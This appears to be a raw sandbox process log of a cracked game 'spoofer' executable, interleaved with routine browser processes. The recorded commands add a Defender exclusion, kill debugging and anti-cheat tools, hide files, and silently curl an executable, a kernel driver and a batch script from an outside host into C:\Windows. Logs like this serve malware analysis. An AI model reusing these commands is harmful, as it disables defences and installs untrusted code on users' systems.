"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\" -spe -an -ai#7zMap31022:112:7zEvent11133
C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe"
C:\Users\Admin\AppData\Roaming\Skype.sfx.exe
"C:\Users\Admin\AppData\Roaming\Skype.sfx.exe"
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\SolaraTab\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im epicgameslauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im epicgameslauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicWebHelper.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicWebHelper.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe > nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\SolaraTab\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
C:\Windows\system32\attrib.exe
attrib +s +h .
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping.exe
C:\Users\Admin\SolaraTab\Skype.exe
"Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EasyAntiCheat.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEService.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEService.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEServices.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEServices.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im "Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BattleEye.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BattleEye.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop BattlEye Service
C:\Windows\system32\sc.exe
sc stop BattlEye Service
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop EasyAntiCheat
C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\sc.exe
sc stop EasyAntiCheat
C:\Users\Admin\AppData\Roaming\Skype.sfx.exe
"C:\Users\Admin\AppData\Roaming\Skype.sfx.exe"
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\SolaraTab\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im epicgameslauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im epicgameslauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicWebHelper.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicWebHelper.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EasyAntiCheat.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEService.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEService.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEServices.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEServices.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BattleEye.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BattleEye.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop BattlEye Service
C:\Windows\system32\sc.exe
sc stop BattlEye Service
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop EasyAntiCheat
C:\Windows\system32\sc.exe
sc stop EasyAntiCheat
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffca019ab58,0x7ffca019ab68,0x7ffca019ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2168 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2920 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4520 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff663e6ae48,0x7ff663e6ae58,0x7ff663e6ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4900 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc860646f8,0x7ffc86064708,0x7ffc86064718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7084 /prefetch:8
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\Downloads\FileGrab.exe
"C:\Users\Admin\Downloads\FileGrab.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/AMIFLDRV64.SYS -o C:\Windows\AMIFLDRV64.SYS --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/AMIFLDRV64.SYS -o C:\Windows\AMIFLDRV64.SYS --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/backgroundcleaner.bat -o C:\Windows\backgroundcleaner.bat --silent
C:\Windows\system32\curl.exe
